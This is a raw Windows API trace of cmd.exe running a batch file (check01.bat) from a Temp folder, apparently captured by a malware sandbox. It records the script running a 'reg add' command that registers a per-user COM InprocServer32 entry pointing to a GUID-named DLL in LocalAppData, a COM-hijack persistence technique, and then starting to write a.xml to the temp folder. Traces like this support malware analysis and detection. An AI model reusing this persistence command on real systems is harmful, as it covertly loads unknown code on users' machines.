[0377.345] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219710 | out: hHeap=0x200000) returned 1
[0377.345] GetProcessHeap () returned 0x200000
[0377.345] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2194a0 | out: hHeap=0x200000) returned 1
[0377.346] GetProcessHeap () returned 0x200000
[0377.346] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d9a0 | out: hHeap=0x200000) returned 1
[0377.346] GetProcessHeap () returned 0x200000
[0377.346] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219230 | out: hHeap=0x200000) returned 1
[0377.346] GetProcessHeap () returned 0x200000
[0377.346] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d940 | out: hHeap=0x200000) returned 1
[0377.346] GetProcessHeap () returned 0x200000
[0377.346] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2190a0 | out: hHeap=0x200000) returned 1
[0377.347] GetProcessHeap () returned 0x200000
[0377.347] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2018d0 | out: hHeap=0x200000) returned 1
[0377.347] GetProcessHeap () returned 0x200000
[0377.348] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0377.348] GetProcessHeap () returned 0x200000
[0377.348] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.348] GetProcessHeap () returned 0x200000
[0377.348] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0377.348] GetProcessHeap () returned 0x200000
[0377.348] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.348] GetProcessHeap () returned 0x200000
[0377.349] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.349] GetProcessHeap () returned 0x200000
[0377.349] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.349] VirtualFree (lpAddress=0x1e10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0377.352] _get_osfhandle (_FileHandle=3) returned 0x6c
[0377.352] SetFilePointer (in: hFile=0x6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0377.352] ReadFile (in: hFile=0x6c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xe4e, lpOverlapped=0x0) returned 1
[0377.352] SetFilePointer (in: hFile=0x6c, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0377.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n", cbMultiByte=188, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 188
[0377.352] _get_osfhandle (_FileHandle=3) returned 0x6c
[0377.352] GetFileType (hFile=0x6c) returned 0x1
[0377.353] _get_osfhandle (_FileHandle=3) returned 0x6c
[0377.353] SetFilePointer (in: hFile=0x6c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0377.353] GetProcessHeap () returned 0x200000
[0377.353] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.353] GetProcessHeap () returned 0x200000
[0377.353] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.353] GetProcessHeap () returned 0x200000
[0377.353] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x2a) returned 0x216d30
[0377.353] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x20
[0377.353] GetProcessHeap () returned 0x200000
[0377.354] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.354] GetProcessHeap () returned 0x200000
[0377.355] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.355] GetProcessHeap () returned 0x200000
[0377.356] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.356] _tell (_FileHandle=3) returned 416
[0377.356] _close (_FileHandle=3) returned 0
[0377.356] _wcsicmp (_String1="reg", _String2="DIR") returned 14
[0377.356] _wcsicmp (_String1="reg", _String2="ERASE") returned 13
[0377.356] _wcsicmp (_String1="reg", _String2="DEL") returned 14
[0377.356] _wcsicmp (_String1="reg", _String2="TYPE") returned -2
[0377.357] _wcsicmp (_String1="reg", _String2="COPY") returned 15
[0377.357] _wcsicmp (_String1="reg", _String2="CD") returned 15
[0377.357] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15
[0377.357] _wcsicmp (_String1="reg", _String2="RENAME") returned -7
[0377.357] _wcsicmp (_String1="reg", _String2="REN") returned -7
[0377.357] _wcsicmp (_String1="reg", _String2="ECHO") returned 13
[0377.357] _wcsicmp (_String1="reg", _String2="SET") returned -1
[0377.357] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2
[0377.357] _wcsicmp (_String1="reg", _String2="DATE") returned 14
[0377.357] _wcsicmp (_String1="reg", _String2="TIME") returned -2
[0377.357] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2
[0377.357] _wcsicmp (_String1="reg", _String2="MD") returned 5
[0377.357] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5
[0377.357] _wcsicmp (_String1="reg", _String2="RD") returned 1
[0377.357] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8
[0377.357] _wcsicmp (_String1="reg", _String2="PATH") returned 2
[0377.357] _wcsicmp (_String1="reg", _String2="GOTO") returned 11
[0377.358] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1
[0377.358] _wcsicmp (_String1="reg", _String2="CLS") returned 15
[0377.358] _wcsicmp (_String1="reg", _String2="CALL") returned 15
[0377.358] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4
[0377.358] _wcsicmp (_String1="reg", _String2="VER") returned -4
[0377.358] _wcsicmp (_String1="reg", _String2="VOL") returned -4
[0377.358] _wcsicmp (_String1="reg", _String2="EXIT") returned 13
[0377.358] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1
[0377.358] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13
[0377.358] _wcsicmp (_String1="reg", _String2="TITLE") returned -2
[0377.358] _wcsicmp (_String1="reg", _String2="START") returned -1
[0377.358] _wcsicmp (_String1="reg", _String2="DPATH") returned 14
[0377.358] _wcsicmp (_String1="reg", _String2="KEYS") returned 7
[0377.358] _wcsicmp (_String1="reg", _String2="MOVE") returned 5
[0377.358] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2
[0377.359] _wcsicmp (_String1="reg", _String2="POPD") returned 2
[0377.359] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17
[0377.359] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12
[0377.359] _wcsicmp (_String1="reg", _String2="BREAK") returned 16
[0377.359] _wcsicmp (_String1="reg", _String2="COLOR") returned 15
[0377.359] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5
[0377.359] SetErrorMode (uMode=0x0) returned 0x0
[0377.359] SetErrorMode (uMode=0x1) returned 0x0
[0377.359] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x218f20, lpFilePart=0x1ef340 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef340*="system32") returned 0x13
[0377.359] SetErrorMode (uMode=0x0) returned 0x1
[0377.360] GetProcessHeap () returned 0x200000
[0377.360] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f10, Size=0x40) returned 0x218f10
[0377.360] GetProcessHeap () returned 0x200000
[0377.360] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f10) returned 0x40
[0377.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0377.360] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0377.360] GetProcessHeap () returned 0x200000
[0377.360] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b400
[0377.360] GetProcessHeap () returned 0x200000
[0377.360] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x218f60
[0377.360] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f60, Size=0x1d0) returned 0x218f60
[0377.361] GetProcessHeap () returned 0x200000
[0377.361] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f60) returned 0x1d0
[0377.361] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0377.361] GetProcessHeap () returned 0x200000
[0377.361] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21cbf0
[0377.361] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cbf0, Size=0x7e) returned 0x21cbf0
[0377.361] GetProcessHeap () returned 0x200000
[0377.361] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cbf0) returned 0x7e
[0377.361] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0377.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0x219a30
[0377.362] FindClose (in: hFindFile=0x219a30 | out: hFindFile=0x219a30) returned 1
[0377.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0xffffffffffffffff
[0377.362] GetLastError () returned 0x2
[0377.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0x219a30
[0377.363] FindClose (in: hFindFile=0x219a30 | out: hFindFile=0x219a30) returned 1
[0377.363] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0377.363] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0377.363] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.363] SetErrorMode (uMode=0x0) returned 0x0
[0377.364] SetErrorMode (uMode=0x1) returned 0x0
[0377.364] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x219310, lpFilePart=0x1eeb90 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1eeb90*="system32") returned 0x13
[0377.364] SetErrorMode (uMode=0x0) returned 0x1
[0377.364] GetProcessHeap () returned 0x200000
[0377.364] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x219300, Size=0x40) returned 0x219300
[0377.364] GetProcessHeap () returned 0x200000
[0377.364] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x219300) returned 0x40
[0377.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0377.364] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0377.364] GetProcessHeap () returned 0x200000
[0377.365] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b5e0
[0377.365] GetProcessHeap () returned 0x200000
[0377.365] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x219350
[0377.365] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x219350, Size=0x1d0) returned 0x219350
[0377.365] GetProcessHeap () returned 0x200000
[0377.365] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x219350) returned 0x1d0
[0377.365] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0377.365] GetProcessHeap () returned 0x200000
[0377.365] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21cc80
[0377.365] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc80, Size=0x7e) returned 0x21cc80
[0377.365] GetProcessHeap () returned 0x200000
[0377.365] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc80) returned 0x7e
[0377.365] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0377.366] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0x21db60
[0377.366] FindClose (in: hFindFile=0x21db60 | out: hFindFile=0x21db60) returned 1
[0377.366] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0xffffffffffffffff
[0377.366] GetLastError () returned 0x2
[0377.366] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0x21db60
[0377.367] FindClose (in: hFindFile=0x21db60 | out: hFindFile=0x21db60) returned 1
[0377.367] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0377.367] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0377.367] GetConsoleTitleW (in: lpConsoleTitle=0x1eee50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.367] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eec08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eebc8 | out: lpAttributeList=0x1eec08, lpSize=0x1eebc8) returned 1
[0377.367] UpdateProcThreadAttribute (in: lpAttributeList=0x1eec08, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eebb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eec08, lpPreviousValue=0x0) returned 1
[0377.368] GetStartupInfoW (in: lpStartupInfo=0x1eed20 | out: lpStartupInfo=0x1eed20*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0377.368] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1
[0377.368] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1eec40*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eebf0 | out: lpCommandLine="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f", lpProcessInformation=0x1eebf0*(hProcess=0x64, hThread=0x6c, dwProcessId=0xc60, dwThreadId=0x398)) returned 1
[0377.379] CloseHandle (hObject=0x6c) returned 1
[0377.379] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0377.380] GetProcessHeap () returned 0x200000
[0377.381] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd90 | out: hHeap=0x200000) returned 1
[0377.381] GetEnvironmentStringsW () returned 0x22a820*
[0377.381] GetProcessHeap () returned 0x200000
[0377.382] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cd10
[0377.382] memcpy (in: _Dst=0x21cd10, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cd10) returned 0x21cd10
[0377.382] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0377.382] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0377.675] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x1eeb38 | out: lpExitCode=0x1eeb38*=0x0) returned 1
[0377.675] CloseHandle (hObject=0x64) returned 1
[0377.676] _vsnwprintf (in: _Buffer=0x1eeda8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eeb48 | out: _Buffer="00000000") returned 8
[0377.676] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0377.676] GetProcessHeap () returned 0x200000
[0377.676] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd10 | out: hHeap=0x200000) returned 1
[0377.677] GetEnvironmentStringsW () returned 0x22a820*
[0377.677] GetProcessHeap () returned 0x200000
[0377.677] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cd10
[0377.677] memcpy (in: _Dst=0x21cd10, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cd10) returned 0x21cd10
[0377.677] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0377.677] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0377.677] GetProcessHeap () returned 0x200000
[0377.677] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd10 | out: hHeap=0x200000) returned 1
[0377.678] GetEnvironmentStringsW () returned 0x22a820*
[0377.678] GetProcessHeap () returned 0x200000
[0377.678] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cd10
[0377.678] memcpy (in: _Dst=0x21cd10, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cd10) returned 0x21cd10
[0377.678] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0377.678] GetProcessHeap () returned 0x200000
[0377.678] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a410 | out: hHeap=0x200000) returned 1
[0377.678] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eec08 | out: lpAttributeList=0x1eec08)
[0377.678] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.678] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.679] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.679] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.680] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.680] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.681] SetConsoleInputExeNameW () returned 0x1
[0377.681] GetConsoleOutputCP () returned 0x1b5
[0377.681] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.682] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.682] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.683] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.683] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.683] SetFilePointer (in: hFile=0x64, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0377.683] GetProcessHeap () returned 0x200000
[0377.683] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc80 | out: hHeap=0x200000) returned 1
[0377.683] GetProcessHeap () returned 0x200000
[0377.684] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219350 | out: hHeap=0x200000) returned 1
[0377.684] GetProcessHeap () returned 0x200000
[0377.684] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b5e0 | out: hHeap=0x200000) returned 1
[0377.684] GetProcessHeap () returned 0x200000
[0377.684] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219300 | out: hHeap=0x200000) returned 1
[0377.684] GetProcessHeap () returned 0x200000
[0377.684] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219140 | out: hHeap=0x200000) returned 1
[0377.684] GetProcessHeap () returned 0x200000
[0377.684] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d940 | out: hHeap=0x200000) returned 1
[0377.685] GetProcessHeap () returned 0x200000
[0377.685] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.685] GetProcessHeap () returned 0x200000
[0377.685] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f60 | out: hHeap=0x200000) returned 1
[0377.685] GetProcessHeap () returned 0x200000
[0377.685] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b400 | out: hHeap=0x200000) returned 1
[0377.685] GetProcessHeap () returned 0x200000
[0377.686] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0377.686] GetProcessHeap () returned 0x200000
[0377.686] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.686] GetProcessHeap () returned 0x200000
[0377.686] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0377.686] GetProcessHeap () returned 0x200000
[0377.686] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.687] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.687] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0377.687] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xd92, lpOverlapped=0x0) returned 1
[0377.687] SetFilePointer (in: hFile=0x64, lDistanceToMove=481, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0377.687] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ > %temp%\\a.xml\r\n", cbMultiByte=65, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ > %temp%\\a.xml\r\n06B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 65
[0377.688] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.688] GetFileType (hFile=0x64) returned 0x1
[0377.688] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.688] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0377.688] GetProcessHeap () returned 0x200000
[0377.688] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.688] GetProcessHeap () returned 0x200000
[0377.688] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.689] GetProcessHeap () returned 0x200000
[0377.689] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.689] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.689] GetProcessHeap () returned 0x200000
[0377.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.689] GetProcessHeap () returned 0x200000
[0377.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.689] GetProcessHeap () returned 0x200000
[0377.690] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.690] _tell (_FileHandle=3) returned 481
[0377.690] _close (_FileHandle=3) returned 0
[0377.690] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.691] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.691] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.691] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.691] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.691] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.691] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.691] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.691] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.691] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.691] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.691] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.692] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.692] GetFileType (hFile=0x7) returned 0x2
[0377.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.693] _dup (_FileHandle=1) returned 3
[0377.694] _close (_FileHandle=1) returned 0
[0377.695] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
